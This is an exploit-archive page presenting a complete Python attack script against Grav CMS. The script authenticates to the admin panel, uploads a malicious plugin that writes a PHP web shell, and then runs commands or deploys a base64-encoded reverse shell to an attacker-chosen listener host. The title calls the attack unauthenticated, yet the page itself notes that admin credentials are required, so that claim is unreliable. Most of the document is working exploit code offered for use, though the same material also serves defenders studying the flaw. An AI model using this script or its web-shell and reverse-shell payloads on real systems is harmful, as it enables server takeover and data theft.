Share
## https://sploitus.com/exploit?id=PACKETSTORM:223728
==================================================================================================================================
| # Title : Grav CMS < 2.0.0-beta.2 Unauthenticated Plugin Installation leading to RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://getgrav.org/ |
==================================================================================================================================
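[+] Summary : This Python exploit targets a vulnerability in Grav CMS versions prior to 2.0.0-beta.2, abusing the Admin "Direct Install" plugin feature to achieve remote code execution. Note that the script as written requires valid Admin credentials (username and password are mandatory arguments).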
[+] POC :
#!/usr/bin/env python3
import argparse
import base64
import json
import os
import sys
import time
import zipfile
import tempfile
import re
import requests
from urllib.parse import urljoin
from bs4 import BeautifulSoup
class GravRCE:
def __init__(self, target_url, username, password, verbose=False, timeout=30):
self.base_url = target_url.rstrip('/')
self.username = username
self.password = password
self.verbose = verbose
self.timeout = timeout
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
})
self.csrf_token = None
self.authenticated = False
def log(self, msg, level="INFO"):
colors = {
"SUCCESS": "\033[92m[+]\033[0m",
"ERROR": "\033[91m[-]\033[0m",
"WARNING": "\033[93m[!]\033[0m",
"INFO": "\033[96m[*]\033[0m",
"PROC": "\033[94m[@]\033[0m"
}
print(f"{colors.get(level, '[*]')} {msg}")
def get_csrf_token(self):
"""Extract CSRF token from login page"""
login_url = urljoin(self.base_url, '/admin/login')
self.log(f"Fetching CSRF token from {login_url}", "PROC")
try:
response = self.session.get(login_url, timeout=self.timeout)
if response.status_code == 200:
soup = BeautifulSoup(response.text, 'html.parser')
for name in ['admin-nonce', 'csrf', '__csrf', 'nonce']:
token_input = soup.find('input', {'name': name})
if token_input:
self.csrf_token = token_input.get('value')
self.log(f"CSRF token found: {self.csrf_token}", "SUCCESS")
return True
meta_tag = soup.find('meta', {'name': 'csrf-token'})
if meta_tag:
self.csrf_token = meta_tag.get('content')
self.log(f"CSRF token found: {self.csrf_token}", "SUCCESS")
return True
self.log("Could not find CSRF token", "ERROR")
return False
except Exception as e:
self.log(f"Error fetching CSRF token: {e}", "ERROR")
return False
def authenticate(self):
"""Authenticate to Grav Admin panel"""
login_url = urljoin(self.base_url, '/admin/login')
self.log(f"Authenticating as {self.username}...", "PROC")
data = {
'username': self.username,
'password': self.password,
'admin-nonce': self.csrf_token,
'task': 'login',
'login': 'Login'
}
try:
response = self.session.post(login_url, data=data, timeout=self.timeout)
if response.status_code == 302 or response.status_code == 200:
if 'dashboard' in response.text.lower() or 'grav' in response.text.lower():
self.authenticated = True
self.log("Authentication successful", "SUCCESS")
return True
elif 'invalid' in response.text.lower():
self.log("Invalid credentials", "ERROR")
return False
self.log(f"Authentication failed: HTTP {response.status_code}", "ERROR")
return False
except Exception as e:
self.log(f"Authentication error: {e}", "ERROR")
return False
def create_malicious_plugin(self, plugin_name, shell_filename):
"""Create malicious plugin ZIP file"""
self.log(f"Creating malicious plugin: {plugin_name}", "PROC")
temp_dir = tempfile.mkdtemp()
plugin_dir = os.path.join(temp_dir, plugin_name)
os.makedirs(plugin_dir)
plugin_php = f'''<?php
namespace Grav\\Plugin;
use Grav\\Common\\Plugin;
class {plugin_name.capitalize()}Plugin extends Plugin {{
public static function getSubscribedEvents(): array {{
return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
}}
public function onPluginsInitialized(): void {{
$shell_path = GRAV_ROOT . '/{shell_filename}';
if (!file_exists($shell_path)) {{
$shell_content = '<?php if(isset($_REQUEST["cmd"])){{ echo "<pre>"; system($_REQUEST["cmd"]); echo "</pre>"; }} ?>';
file_put_contents($shell_path, $shell_content);
}}
}}
}}
?>
'''
blueprints = f'''name: {plugin_name.capitalize()}
version: 1.0.0
description: "Plugin installed via direct install"
author:
name: Grav
homepage: https://getgrav.org
license: MIT
form:
validation: loose
fields:
enabled:
type: toggle
label: Plugin status
highlight: 1
default: 1
options:
1: Enabled
0: Disabled
validate:
type: bool
'''
plugin_yaml = 'enabled: true\n'
with open(os.path.join(plugin_dir, f"{plugin_name}.php"), 'w') as f:
f.write(plugin_php)
with open(os.path.join(plugin_dir, "blueprints.yaml"), 'w') as f:
f.write(blueprints)
with open(os.path.join(plugin_dir, f"{plugin_name}.yaml"), 'w') as f:
f.write(plugin_yaml)
zip_path = os.path.join(temp_dir, f"{plugin_name}.zip")
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf:
for root, dirs, files in os.walk(plugin_dir):
for file in files:
file_path = os.path.join(root, file)
arcname = os.path.relpath(file_path, temp_dir)
zipf.write(file_path, arcname)
with open(zip_path, 'rb') as f:
zip_data = f.read()
import shutil
shutil.rmtree(temp_dir)
self.log(f"Plugin created: {len(zip_data)} bytes", "SUCCESS")
return zip_data
def get_admin_nonce(self):
"""Extract admin nonce from direct-install page"""
direct_install_url = urljoin(self.base_url, '/admin/tools/direct-install')
self.log("Fetching admin nonce...", "PROC")
try:
response = self.session.get(direct_install_url, timeout=self.timeout)
if response.status_code == 200:
soup = BeautifulSoup(response.text, 'html.parser')
nonce_input = soup.find('input', {'name': 'admin-nonce'})
if nonce_input:
admin_nonce = nonce_input.get('value')
self.log(f"Admin nonce obtained: {admin_nonce}", "SUCCESS")
return admin_nonce
self.log("Could not find admin nonce", "ERROR")
return None
except Exception as e:
self.log(f"Error fetching admin nonce: {e}", "ERROR")
return None
def upload_plugin(self, zip_data, plugin_name):
"""Upload plugin via Direct Install"""
direct_install_url = urljoin(self.base_url, '/admin/tools/direct-install')
self.log(f"Uploading plugin to {direct_install_url}", "PROC")
admin_nonce = self.get_admin_nonce()
if not admin_nonce:
return False
files = {
'admin-nonce': (None, admin_nonce),
'data[file]': (f'{plugin_name}.zip', zip_data, 'application/zip'),
'task': (None, 'direct-install')
}
try:
response = self.session.post(direct_install_url, files=files, timeout=self.timeout)
if response.status_code == 302 or response.status_code == 200:
if 'success' in response.text.lower() or 'installed' in response.text.lower():
self.log("Plugin uploaded and installed successfully!", "SUCCESS")
return True
elif 'error' in response.text.lower():
self.log(f"Installation error: {response.text[:200]}", "ERROR")
return False
self.log(f"Upload failed: HTTP {response.status_code}", "ERROR")
return False
except Exception as e:
self.log(f"Upload error: {e}", "ERROR")
return False
def trigger_plugin(self):
"""Trigger plugin by accessing main page"""
self.log("Triggering plugin to deploy webshell...", "PROC")
try:
response = self.session.get(self.base_url, timeout=self.timeout)
if response.status_code == 200:
self.log("Plugin triggered successfully", "SUCCESS")
return True
return False
except Exception as e:
self.log(f"Error triggering plugin: {e}", "ERROR")
return False
def check_webshell(self, shell_filename):
"""Verify webshell deployment"""
shell_url = urljoin(self.base_url, shell_filename)
self.log(f"Checking webshell at {shell_url}", "PROC")
test_cmd = "echo WEBSHELL_TEST"
try:
response = self.session.get(shell_url, params={'cmd': test_cmd}, timeout=self.timeout)
if response.status_code == 200 and 'WEBSHELL_TEST' in response.text:
self.log("Webshell is accessible!", "SUCCESS")
return shell_url
return None
except Exception as e:
self.log(f"Webshell check failed: {e}", "ERROR")
return None
def execute_command(self, shell_url, cmd):
"""Execute command via webshell"""
try:
response = self.session.get(shell_url, params={'cmd': cmd}, timeout=self.timeout)
if response.status_code == 200:
output = response.text
output = re.sub(r'<pre>', '', output)
output = re.sub(r'</pre>', '', output)
return output.strip()
return None
except Exception as e:
self.log(f"Command execution error: {e}", "ERROR")
return None
def deploy_reverse_shell(self, shell_url, lhost, lport):
"""Deploy reverse shell payload"""
self.log(f"Deploying reverse shell to {lhost}:{lport}...", "PROC")
rev_shell = f'''<?php
$sock = fsockopen("{lhost}", {lport});
if ($sock) {{
exec("/bin/sh -i <&3 >&3 2>&3", $output);
fwrite($sock, implode("\\n", $output));
fclose($sock);
}}
?>'''
b64_shell = base64.b64encode(rev_shell.encode()).decode()
deploy_cmd = f"echo '{b64_shell}' | base64 -d > /tmp/revshell.php && php /tmp/revshell.php"
self.execute_command(shell_url, deploy_cmd)
self.log("Reverse shell payload sent. Check your listener!", "SUCCESS")
def run(self, shell_filename=None, lhost=None, lport=None, command=None):
"""Main exploit routine"""
self.log(f"Target: {self.base_url}")
if not self.get_csrf_token():
self.log("Failed to get CSRF token", "ERROR")
return False
if not self.authenticate():
self.log("Authentication failed", "ERROR")
return False
plugin_name = "shellplugin_" + str(int(time.time()))
if not shell_filename:
shell_filename = f"shell_{int(time.time())}.php"
zip_data = self.create_malicious_plugin(plugin_name, shell_filename)
if not self.upload_plugin(zip_data, plugin_name):
self.log("Plugin upload failed", "ERROR")
return False
if not self.trigger_plugin():
self.log("Failed to trigger plugin", "WARNING")
shell_url = self.check_webshell(shell_filename)
if not shell_url:
self.log("Webshell not found. Exploit may have failed.", "ERROR")
return False
if command:
self.log(f"Executing command: {command}")
output = self.execute_command(shell_url, command)
if output:
print("\n" + "=" * 60)
print(output)
print("=" * 60)
elif lhost and lport:
self.deploy_reverse_shell(shell_url, lhost, lport)
else:
self.log("Interactive shell mode. Type 'exit' to quit.", "SUCCESS")
print("\n" + "=" * 60)
print("Webshell available at:", shell_url)
print("Commands will be executed on the target.")
print("=" * 60 + "\n")
while True:
try:
cmd = input("\033[92mshell>\033[0m ").strip()
if cmd.lower() in ['exit', 'quit']:
break
if cmd:
output = self.execute_command(shell_url, cmd)
if output:
print(output)
except KeyboardInterrupt:
print("\nExiting...")
break
return True
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-42607 - Grav CMS Remote Code Execution",
epilog="""
Examples:
python3 exploit.py -t http://localhost/grav -u admin -p admin123
python3 exploit.py -t http://localhost/grav -u admin -p admin123 -c "id"
python3 exploit.py -t http://localhost/grav -u admin -p admin123 --reverse-shell --lhost 10.0.0.5 --lport 4444
python3 exploit.py -t http://localhost/grav -u admin -p admin123 --interactive
"""
)
parser.add_argument("-t", "--target", required=True, help="Target Grav CMS URL")
parser.add_argument("-u", "--username", required=True, help="Grav Admin username")
parser.add_argument("-p", "--password", required=True, help="Grav Admin password")
parser.add_argument("-c", "--command", help="Command to execute")
parser.add_argument("--reverse-shell", action="store_true", help="Deploy reverse shell")
parser.add_argument("--lhost", help="Listener host for reverse shell")
parser.add_argument("--lport", type=int, help="Listener port for reverse shell")
parser.add_argument("--interactive", action="store_true", help="Interactive shell mode")
parser.add_argument("--shell-file", help="Webshell filename (default: auto-generated)")
parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
parser.add_argument("--timeout", type=int, default=30, help="Request timeout (seconds)")
args = parser.parse_args()
print("""
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CVE-2026-42607 - Grav CMS Remote Code Execution β
β Unauthenticated Plugin Installation leading to RCE β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
""")
exploit = GravRCE(
target_url=args.target,
username=args.username,
password=args.password,
verbose=args.verbose,
timeout=args.timeout
)
if args.reverse_shell:
if not args.lhost or not args.lport:
print("[-] --reverse-shell requires --lhost and --lport")
sys.exit(1)
success = exploit.run(
shell_filename=args.shell_file,
lhost=args.lhost,
lport=args.lport
)
elif args.interactive or args.command:
success = exploit.run(
shell_filename=args.shell_file,
command=args.command
)
else:
success = exploit.run(shell_filename=args.shell_file)
sys.exit(0 if success else 1)
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================